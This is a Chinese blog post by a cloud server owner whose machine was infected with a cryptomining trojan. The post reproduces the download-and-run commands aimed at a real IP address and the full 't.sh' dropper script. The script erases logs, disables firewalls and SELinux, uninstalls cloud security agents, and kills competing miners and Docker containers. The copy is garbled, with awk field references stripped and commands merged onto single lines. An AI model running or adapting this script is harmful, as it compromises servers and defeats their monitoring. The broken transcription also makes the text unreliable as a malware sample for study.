美文网首页
可恶的木马脚本,让大家看看

可恶的木马脚本,让大家看看

作者: 飞牛在天 | 来源:发表于2020-01-29 13:40 被阅读0次

    最近阿里云上中了挖矿木马。大概就是从网上下载一段脚本,然后执行。
    网上查了很多资料。有的人是通过redis被植入的。而我是通过apache或者memcache被植入的,也许是其他的,还不太懂,请高人帮忙。

    //httpd进程会执行一下语句。

    curl 217.12.221.244/t.sh|sh
    wget -O /var/tmp/kinsing http://217.12.221.244/kinsing

    以下就是那个t.sh的内容

    !/bin/sh

    ulimit -n 65535
    rm -rf /var/log/syslog
    chattr -iua /tmp/
    chattr -iua /var/tmp/
    ufw disable
    iptables -F
    echo "nope" >/tmp/log_rot
    sudo sysctl kernel.nmi_watchdog=0
    echo '0' >/proc/sys/kernel/nmi_watchdog
    echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
    userdel akay
    userdel vfinder
    chattr -iae /root/.ssh/
    chattr -iae /root/.ssh/authorized_keys
    rm -rf /tmp/addres*
    rm -rf /tmp/walle*
    rm -rf /tmp/keys
    if ps aux | grep -i '[a]liyun'; then
    curl http://update.aegis.aliyun.com/download/uninstall.sh | bash
    curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
    pkill aliyun-service
    rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
    rm -rf /usr/local/aegis*
    systemctl stop aliyun.service
    systemctl disable aliyun.service
    service bcm-agent stop
    yum remove bcm-agent -y
    apt-get remove bcm-agent -y
    elif ps aux | grep -i '[y]unjing'; then
    /usr/local/qcloud/stargate/admin/uninstall.sh
    /usr/local/qcloud/YunJing/uninst.sh
    /usr/local/qcloud/monitor/barad/admin/uninstall.sh
    fi
    netstat -anp | grep 185.71.65.238 | awk '{print 7}' | awk -F'[/]' '{print1}' | xargs -I % kill -9 %
    netstat -anp | grep 140.82.52.87 | awk '{print 7}' | awk -F'[/]' '{print1}' | xargs -I % kill -9 %
    netstat -anp | grep :443 | awk '{print 7}' | awk -F'[/]' '{print1}' | grep -v "-" | xargs -I % kill -9 %
    netstat -anp | grep :23 | awk '{print 7}' | awk -F'[/]' '{print1}' | grep -v "-" | xargs -I % kill -9 %
    netstat -anp | grep :443 | awk '{print 7}' | awk -F'[/]' '{print1}' | grep -v "-" | xargs -I % kill -9 %
    netstat -anp | grep :143 | awk '{print 7}' | awk -F'[/]' '{print1}' | grep -v "-" | xargs -I % kill -9 %
    netstat -anp | grep :2222 | awk '{print 7}' | awk -F'[/]' '{print1}' | grep -v "-" | xargs -I % kill -9 %
    netstat -anp | grep :3333 | awk '{print 7}' | awk -F'[/]' '{print1}' | grep -v "-" | xargs -I % kill -9 %
    netstat -anp | grep :3389 | awk '{print 7}' | awk -F'[/]' '{print1}' | grep -v "-" | xargs -I % kill -9 %
    netstat -anp | grep :4444 | awk '{print 7}' | awk -F'[/]' '{print1}' | grep -v "-" | xargs -I % kill -9 %
    netstat -anp | grep :5555 | awk '{print 7}' | awk -F'[/]' '{print1}' | grep -v "-" | xargs -I % kill -9 %
    netstat -anp | grep :6666 | awk '{print 7}' | awk -F'[/]' '{print1}' | grep -v "-" | xargs -I % kill -9 %
    netstat -anp | grep :6665 | awk '{print 7}' | awk -F'[/]' '{print1}' | grep -v "-" | xargs -I % kill -9 %
    netstat -anp | grep :6667 | awk '{print 7}' | awk -F'[/]' '{print1}' | grep -v "-" | xargs -I % kill -9 %
    netstat -anp | grep :7777 | awk '{print 7}' | awk -F'[/]' '{print1}' | grep -v "-" | xargs -I % kill -9 %
    netstat -anp | grep :8444 | awk '{print 7}' | awk -F'[/]' '{print1}' | grep -v "-" | xargs -I % kill -9 %
    netstat -anp | grep :3347 | awk '{print 7}' | awk -F'[/]' '{print1}' | grep -v "-" | xargs -I % kill -9 %
    netstat -anp | grep :14444 | awk '{print 7}' | awk -F'[/]' '{print1}' | grep -v "-" | xargs -I % kill -9 %
    netstat -anp | grep :14433 | awk '{print 7}' | awk -F'[/]' '{print1}' | grep -v "-" | xargs -I % kill -9 %
    netstat -anp | grep :13531 | awk '{print 7}' | awk -F'[/]' '{print1}' | grep -v "-" | xargs -I % kill -9 %
    ps aux | grep -vw kdevtmpfsi | grep -v grep | awk '{if(3>80.0) print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep ':3333' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep ':5555' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'kworker -c' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'log_' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'systemten' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'netns' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'voltuned' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'darwin' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep '/tmp/dl' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/ddg' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep '/tmp/pprt' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/ppol' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep '/tmp/65ccE' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/jmx*' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep '/tmp/2Ne80
    ' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'IOFoqIgyC0zmf2UR' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep '45.76.122.92' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '51.38.191.178' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep '51.15.56.161' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '86s.jpg' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'aGTSGJJp' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'nMrfmnRa' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'PuNY5tm2' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'I0r8Jyyt' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'AgdgACUD' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'uiZvwxG8' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'BtwXn5qH' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep '3XEzey2T' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 't2tKrCSZ' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'HD7fcBgg' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'zXcDajSs' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep '3lmigMo' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'AkMK4A2' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'AJ2AkKe' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'HiPxCJRS' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'http_0xCC030' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'http_0xCC031' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'http_0xCC032' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'http_0xCC033' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep "C4iLM4L" | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | awk '{ if(substr(11,1,2)=="./" && substr(12,1,2)=="./") print 2 }' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/boot/vmlinuz' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep "i4b503a52cc5" | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "dgqtrcst23rtdi3ldqk322j2" | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep "2g0uv7npuhrlatd" | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "nqscheduler" | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep "rkebbwgqpl4npmm" | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep "]" | awk '3>10.0{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "2fhtu70teuhtoh78jc5s" | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep "0kwti6ut420t" | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "44ct7udt0patws3agkdfqnjm" | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep -v "/" | grep -v "-" | grep -v "_" | awk 'length(11)>19{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep "[^" | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "rsync" | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep "watchd0g" | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | egrep 'wnTKYg|2t3ik|qW3xT.2|ddg' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep "158.69.133.18:8220" | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "/tmp/java" | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'gitee.com' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/java' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep '104.248.4.162' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '89.35.39.78' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep '/dev/shm/z3.sh' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'kthrotlds' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'ksoftirqds' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'netdns' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'watchdogs' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v root | grep -v dblaunch | grep -v dblaunchs | grep -v dblaunched | grep -v apache2 | grep -v atd | grep -v kdevtmpfsi | awk '3>80.0{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep " ps" | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep "sync_supers" | cut -c 9-15 | xargs -I % kill -9 %
    ps aux | grep -v grep | grep "cpuset" | cut -c 9-15 | xargs -I % kill -9 %
    ps aux | grep -v grep | grep -v aux | grep "x]" | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep "sh] <" | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep -v aux | grep " []" | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/l.sh' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep '/tmp/zmcat' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'CnzFVPLF' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'CvKzzZLs' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/udevd' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'sustse' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'sustse3' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'mr.sh' | grep 'wget' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'mr.sh' | grep 'curl' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep '2mr.sh' | grep 'wget' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '2mr.sh' | grep 'curl' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'cr5.sh' | grep 'wget' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'cr5.sh' | grep 'curl' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'logo9.jpg' | grep 'wget' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'logo9.jpg' | grep 'curl' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'j2.conf' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'luk-cpu' | grep 'wget' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'luk-cpu' | grep 'curl' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'ficov' | grep 'wget' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'ficov' | grep 'curl' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'he.sh' | grep 'wget' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'he.sh' | grep 'curl' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'miner.sh' | grep 'wget' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'miner.sh' | grep 'curl' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'nullcrew' | grep 'wget' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'nullcrew' | grep 'curl' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '107.174.47.156' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep '83.220.169.247' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '51.38.203.146' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep '144.217.45.45' | awk '{print 2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '107.174.47.181' | awk '{print2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep '176.31.6.16' | awk '{print 2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print2}' | xargs -I % kill -9 %
    ps auxf | grep -v grep | grep "pool.t00ls.ru" | awk '{print 2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{print2}' | xargs -I % kill -9 %
    ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{print 2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "zhuabcn@yahoo.com" | awk '{print2}' | xargs -I % kill -9 %
    ps auxf | grep -v grep | grep "monerohash.com" | awk '{print 2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{print2}' | xargs -I % kill -9 %
    ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{print 2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{print2}' | xargs -I % kill -9 %
    ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{print 2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{print2}' | xargs -I % kill -9 %
    ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{print 2}' | xargs -I % kill -9 % ps auxf | grep xiaoyao | awk '{print2}' | xargs -I % kill -9 %
    ps auxf | grep xiaoxue | awk '{print 2}' | xargs -I % kill -9 % netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print7}' | sed -e "s//.//g" | xargs -I % kill -9 %
    netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED|SYN_SENT' | awk '{print $7}' | sed -e "s//.
    //g" | xargs -I % kill -9 %
    pgrep -f monerohash | xargs -I % kill -9 %
    pgrep -f L2Jpbi9iYXN | xargs -I % kill -9 %
    pgrep -f xzpauectgr | xargs -I % kill -9 %
    pgrep -f slxfbkmxtd | xargs -I % kill -9 %
    pgrep -f mixtape | xargs -I % kill -9 %
    pgrep -f addnj | xargs -I % kill -9 %
    pgrep -f 200.68.17.196 | xargs -I % kill -9 %
    pgrep -f IyEvYmluL3NoCgpzUG | xargs -I % kill -9 %
    pgrep -f KHdnZXQgLXFPLSBodHRw | xargs -I % kill -9 %
    pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3 | xargs -I % kill -9 %
    pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo | xargs -I % kill -9 %
    pgrep -f mwyumwdbpq.conf | xargs -I % kill -9 %
    pgrep -f honvbsasbf.conf | xargs -I % kill -9 %
    pgrep -f mqdsflm.cf | xargs -I % kill -9 %
    pgrep -f stratum | xargs -I % kill -9 %
    pgrep -f lower.sh | xargs -I % kill -9 %
    pgrep -f ./ppp | xargs -I % kill -9 %
    pgrep -f cryptonight | xargs -I % kill -9 %
    pgrep -f ./seervceaess | xargs -I % kill -9 %
    pgrep -f ./servceaess | xargs -I % kill -9 %
    pgrep -f ./servceas | xargs -I % kill -9 %
    pgrep -f ./servcesa | xargs -I % kill -9 %
    pgrep -f ./vsp | xargs -I % kill -9 %
    pgrep -f ./jvs | xargs -I % kill -9 %
    pgrep -f ./pvv | xargs -I % kill -9 %
    pgrep -f ./vpp | xargs -I % kill -9 %
    pgrep -f ./pces | xargs -I % kill -9 %
    pgrep -f ./rspce | xargs -I % kill -9 %
    pgrep -f ./haveged | xargs -I % kill -9 %
    pgrep -f ./jiba | xargs -I % kill -9 %
    pgrep -f ./watchbog | xargs -I % kill -9 %
    pgrep -f ./A7mA5gb | xargs -I % kill -9 %
    pgrep -f kacpi_svc | xargs -I % kill -9 %
    pgrep -f kswap_svc | xargs -I % kill -9 %
    pgrep -f kauditd_svc | xargs -I % kill -9 %
    pgrep -f kpsmoused_svc | xargs -I % kill -9 %
    pgrep -f kseriod_svc | xargs -I % kill -9 %
    pgrep -f kthreadd_svc | xargs -I % kill -9 %
    pgrep -f ksoftirqd_svc | xargs -I % kill -9 %
    pgrep -f kintegrityd_svc | xargs -I % kill -9 %
    pgrep -f jawa | xargs -I % kill -9 %
    pgrep -f oracle.jpg | xargs -I % kill -9 %
    pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN | xargs -I % kill -9 %
    pgrep -f 188.209.49.54 | xargs -I % kill -9 %
    pgrep -f 181.214.87.241 | xargs -I % kill -9 %
    pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ | xargs -I % kill -9 %
    pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj | xargs -I % kill -9 %
    pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK | xargs -I % kill -9 %
    pgrep -f servim | xargs -I % kill -9 %
    pgrep -f kblockd_svc | xargs -I % kill -9 %
    pgrep -f native_svc | xargs -I % kill -9 %
    pgrep -f ynn | xargs -I % kill -9 %
    pgrep -f 65ccEJ7 | xargs -I % kill -9 %
    pgrep -f jmxx | xargs -I % kill -9 %
    pgrep -f 2Ne80nA | xargs -I % kill -9 %
    pgrep -f sysstats | xargs -I % kill -9 %
    pgrep -f systemxlv | xargs -I % kill -9 %
    pgrep -f watchbog | xargs -I % kill -9 %
    pgrep -f OIcJi1m | xargs -I % kill -9 %
    pkill -f biosetjenkins
    pkill -f Loopback
    pkill -f apaceha
    pkill -f cryptonight
    pkill -f stratum
    pkill -f mixnerdx
    pkill -f performedl
    pkill -f JnKihGjn
    pkill -f irqba2anc1
    pkill -f irqba5xnc1
    pkill -f irqbnc1
    pkill -f ir29xc1
    pkill -f conns
    pkill -f irqbalance
    pkill -f crypto-pool
    pkill -f XJnRj
    pkill -f mgwsl
    pkill -f pythno
    pkill -f jweri
    pkill -f lx26
    pkill -f NXLAi
    pkill -f BI5zj
    pkill -f askdljlqw
    pkill -f minerd
    pkill -f minergate
    pkill -f Guard.sh
    pkill -f ysaydh
    pkill -f bonns
    pkill -f donns
    pkill -f kxjd
    pkill -f Duck.sh
    pkill -f bonn.sh
    pkill -f conn.sh
    pkill -f kworker34
    pkill -f kw.sh
    pkill -f pro.sh
    pkill -f polkitd
    pkill -f acpid
    pkill -f icb5o
    pkill -f nopxi
    pkill -f irqbalanc1
    pkill -f minerd
    pkill -f i586
    pkill -f gddr
    pkill -f mstxmr
    pkill -f ddg.2011
    pkill -f wnTKYg
    pkill -f deamon
    pkill -f disk_genius
    pkill -f sourplum
    pkill -f polkitd
    pkill -f nanoWatch
    pkill -f zigw
    pkill -f devtool
    pkill -f devtools
    pkill -f systemctI
    pkill -f watchbog
    pkill -f cryptonight
    pkill -f sustes
    pkill -f xmrig
    pkill -f xmrig-cpu
    pkill -f 121.42.151.137
    pkill -f sysguard
    pkill -f networkservice
    pkill -f sysupdate
    pkill -f init12.cfg
    pkill -f nginxk
    pkill -f tmp/wc.conf
    pkill -f xmrig-notls
    pkill -f xmr-stak
    pkill -f suppoie
    pkill -f zer0day.ru
    pkill -f dbus-daemon--system
    pkill -f nullcrew
    pkill -f systemctI
    pkill -f kworkerds
    pkill -f init10.cfg
    pkill -f /wl.conf
    pkill -f crond64
    pkill -f sustse
    pkill -f vmlinuz
    pkill -f exin
    pkill -f apachiii
    rm -rf /usr/bin/config.json
    rm -rf /usr/bin/exin
    killall log_rot
    pkill -f log_rot
    rm -rf /tmp/wc.conf
    rm -rf /tmp/log_rot
    rm -rf /tmp/apachiii
    rm -rf /tmp/sustse
    rm -rf /tmp/php
    rm -rf /tmp/p2.conf
    rm -rf /tmp/pprt
    rm -rf /tmp/ppol
    rm -rf /tmp/javax/config.sh
    rm -rf /tmp/javax/sshd2
    rm -rf /tmp/.profile
    rm -rf /tmp/1.so
    rm -rf /tmp/kworkerds
    rm -rf /tmp/kworkerds3
    rm -rf /tmp/kworkerdssx
    rm -rf /tmp/xd.json
    rm -rf /tmp/syslogd
    rm -rf /tmp/syslogdb
    rm -rf /tmp/65ccEJ7
    rm -rf /tmp/jmxx
    rm -rf /tmp/2Ne80nA
    rm -rf /tmp/dl
    rm -rf /tmp/ddg
    rm -rf /tmp/systemxlv
    rm -rf /tmp/systemctI
    rm -rf /tmp/.abc
    rm -rf /tmp/osw.hb
    rm -rf /tmp/.tmpleve
    rm -rf /tmp/.tmpnewzz
    rm -rf /tmp/.java
    rm -rf /tmp/.omed
    rm -rf /tmp/.tmpc
    rm -rf /tmp/.tmpleve
    rm -rf /tmp/.tmpnewzz
    rm -rf /tmp/gates.lod
    rm -rf /tmp/conf.n
    rm -rf /tmp/update.sh
    rm -rf /tmp/devtool
    rm -rf /tmp/devtools
    rm -rf /tmp/fs
    rm -rf /tmp/.rod
    rm -rf /tmp/.rod.tgz
    rm -rf /tmp/.rod.tgz.1
    rm -rf /tmp/.rod.tgz.2
    rm -rf /tmp/.mer
    rm -rf /tmp/.mer.tgz
    rm -rf /tmp/.mer.tgz.1
    rm -rf /tmp/.hod
    rm -rf /tmp/.hod.tgz
    rm -rf /tmp/.hod.tgz.1
    rm -rf /tmp/84Onmce
    rm -rf /tmp/C4iLM4L
    rm -rf /tmp/lilpip
    rm -rf /tmp/3lmigMo
    rm -rf /tmp/am8jmBP
    rm -rf /tmp/tmp.txt
    rm -rf /tmp/baby
    rm -rf /tmp/.lib
    rm -rf /tmp/systemd
    rm -rf /tmp/lib.tar.gz
    rm -rf /tmp/baby
    rm -rf /tmp/java
    rm -rf /tmp/j2.conf
    rm -rf /tmp/.mynews1234
    rm -rf /tmp/a3e12d
    rm -rf /tmp/.pt
    rm -rf /tmp/.pt.tgz
    rm -rf /tmp/.pt.tgz.1
    rm -rf /tmp/go
    rm -rf /tmp/java
    rm -rf /tmp/j2.conf
    rm -rf /tmp/.tmpnewasss
    rm -rf /tmp/java
    rm -rf /tmp/go.sh
    rm -rf /tmp/go2.sh
    rm -rf /tmp/khugepageds
    rm -rf /tmp/.censusqqqqqqqqq
    rm -rf /tmp/.kerberods
    rm -rf /tmp/kerberods
    rm -rf /tmp/seasame
    rm -rf /tmp/touch
    rm -rf /tmp/.p
    rm -rf /tmp/runtime2.sh
    rm -rf /tmp/runtime.sh
    rm -rf /dev/shm/z3.sh
    rm -rf /dev/shm/z2.sh
    rm -rf /dev/shm/.scr
    rm -rf /dev/shm/.kerberods
    rm -f /etc/ld.so.preload
    rm -f /usr/local/lib/libioset.so
    chattr -i /etc/ld.so.preload
    rm -f /etc/ld.so.preload
    rm -f /usr/local/lib/libioset.so
    rm -rf /tmp/watchdogs
    rm -rf /etc/cron.d/tomcat
    rm -rf /etc/rc.d/init.d/watchdogs
    rm -rf /usr/sbin/watchdogs
    rm -f /tmp/kthrotlds
    rm -f /etc/rc.d/init.d/kthrotlds
    rm -rf /tmp/.sysbabyuuuuu12
    rm -rf /tmp/logo9.jpg
    rm -rf /tmp/miner.sh
    rm -rf /tmp/nullcrew
    rm -rf /tmp/proc
    rm -rf /tmp/2.sh
    rm /opt/atlassian/confluence/bin/1.sh
    rm /opt/atlassian/confluence/bin/1.sh.1
    rm /opt/atlassian/confluence/bin/1.sh.2
    rm /opt/atlassian/confluence/bin/1.sh.3
    rm /opt/atlassian/confluence/bin/3.sh
    rm /opt/atlassian/confluence/bin/3.sh.1
    rm /opt/atlassian/confluence/bin/3.sh.2
    rm /opt/atlassian/confluence/bin/3.sh.3
    rm -rf /var/tmp/f41
    rm -rf /var/tmp/2.sh
    rm -rf /var/tmp/config.json
    rm -rf /var/tmp/xmrig
    rm -rf /var/tmp/1.so
    rm -rf /var/tmp/kworkerds3
    rm -rf /var/tmp/kworkerdssx
    rm -rf /var/tmp/kworkerds
    rm -rf /var/tmp/wc.conf
    rm -rf /var/tmp/nadezhda.
    rm -rf /var/tmp/nadezhda.arm
    rm -rf /var/tmp/nadezhda.arm.1
    rm -rf /var/tmp/nadezhda.arm.2
    rm -rf /var/tmp/nadezhda.x86_64
    rm -rf /var/tmp/nadezhda.x86_64.1
    rm -rf /var/tmp/nadezhda.x86_64.2
    rm -rf /var/tmp/sustse3
    rm -rf /var/tmp/sustse
    rm -rf /var/tmp/moneroocean/
    rm -rf /var/tmp/devtool
    rm -rf /var/tmp/devtools
    rm -rf /var/tmp/play.sh
    rm -rf /var/tmp/systemctI
    rm -rf /var/tmp/update.sh
    rm -rf /var/tmp/.java
    rm -rf /var/tmp/1.sh
    rm -rf /var/tmp/conf.n
    rm -r /var/tmp/lib
    rm -r /var/tmp/.lib
    rm -rf /tmp/config.json
    chattr -iau /tmp/lok
    chmod +700 /tmp/lok
    rm -rf /tmp/lok

    yum install -y docker.io || apt-get install docker.io;

    docker ps | grep "pocosow" | awk '{print 1}' | xargs -I % docker kill % docker ps | grep "gakeaws" | awk '{print1}' | xargs -I % docker kill %
    docker ps | grep "azulu" | awk '{print 1}' | xargs -I % docker kill % docker ps | grep "auto" | awk '{print1}' | xargs -I % docker kill %
    docker ps | grep "xmr" | awk '{print 1}' | xargs -I % docker kill % docker ps | grep "mine" | awk '{print1}' | xargs -I % docker kill %
    docker ps | grep "monero" | awk '{print 1}' | xargs -I % docker kill % docker ps | grep "slowhttp" | awk '{print1}' | xargs -I % docker kill %
    docker ps | grep "bash.shell" | awk '{print 1}' | xargs -I % docker kill % docker ps | grep "entrypoint.sh" | awk '{print1}' | xargs -I % docker kill %
    docker ps | grep "/var/sbin/bash" | awk '{print 1}' | xargs -I % docker kill % docker images -a | grep "pocosow" | awk '{print3}' | xargs -I % docker rmi -f %
    docker images -a | grep "gakeaws" | awk '{print 3}' | xargs -I % docker rmi -f % docker images -a | grep "buster-slim" | awk '{print3}' | xargs -I % docker rmi -f %
    docker images -a | grep "hello-" | awk '{print 3}' | xargs -I % docker rmi -f % docker images -a | grep "azulu" | awk '{print3}' | xargs -I % docker rmi -f %
    docker images -a | grep "registry" | awk '{print 3}' | xargs -I % docker rmi -f % docker images -a | grep "xmr" | awk '{print3}' | xargs -I % docker rmi -f %
    docker images -a | grep "auto" | awk '{print 3}' | xargs -I % docker rmi -f % docker images -a | grep "mine" | awk '{print3}' | xargs -I % docker rmi -f %
    docker images -a | grep "monero" | awk '{print 3}' | xargs -I % docker rmi -f % docker images -a | grep "slowhttp" | awk '{print3}' | xargs -I % docker rmi -f %
    setenforce 0
